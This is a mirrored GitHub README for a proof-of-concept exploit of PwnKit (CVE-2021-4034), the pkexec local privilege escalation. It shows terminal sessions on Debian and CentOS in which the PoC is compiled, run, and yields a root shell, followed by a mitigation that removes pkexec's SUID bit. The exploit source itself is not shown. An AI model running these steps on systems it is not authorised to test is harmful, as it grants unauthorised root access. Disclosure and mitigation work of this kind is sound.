r3pek/CVE-2021-4034
1
0
Fork 0
mirror of https://github.com/arthepsy/CVE-2021-4034.git synced 2025-02-05 10:59:11 +00:00
Code Releases Activity
CVE-2021-4034/README.md

53 lines
2.1 KiB
Markdown
Raw Normal View History

Create README.md
2022-01-26 01:05:00 +00:00
# CVE-2021-4034
Update README.md
2022-01-26 05:23:20 +00:00
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkits pkexec (CVE-2021-4034)
Create README.md
2022-01-26 01:05:00 +00:00
Update README.md
2022-01-26 07:38:31 +00:00
https://seclists.org/oss-sec/2022/q1/80
Create README.md
2022-01-26 01:05:00 +00:00
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
# PoC
Verified on Debian 10 and CentOS 7.
```
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
```
```
[user@centos ~]$ grep PRETTY /etc/os-release
PRETTY_NAME="CentOS Linux 7 (Core)"
[user@centos ~]$ id
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[user@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
```
Mitigation
2022-02-12 05:20:17 +00:00
## About Polkit pkexec for Linux
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
# Mitigation
If no patches are available for your operating system, you can remove the SUID-bit from pkexec as a temporary mitigation.
```bash
# chmod 0755 /usr/bin/pkexec
```
The exploit then will fail complaining that `pkexec` must have the
setuid bit enabled.
```bash
xd@The-Watcher:~$ sudo chmod 0755 /usr/bin/pkexec
xd@The-Watcher:~$ ./cve-2021-4034
GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
pkexec must be setuid root
```
Copy permalink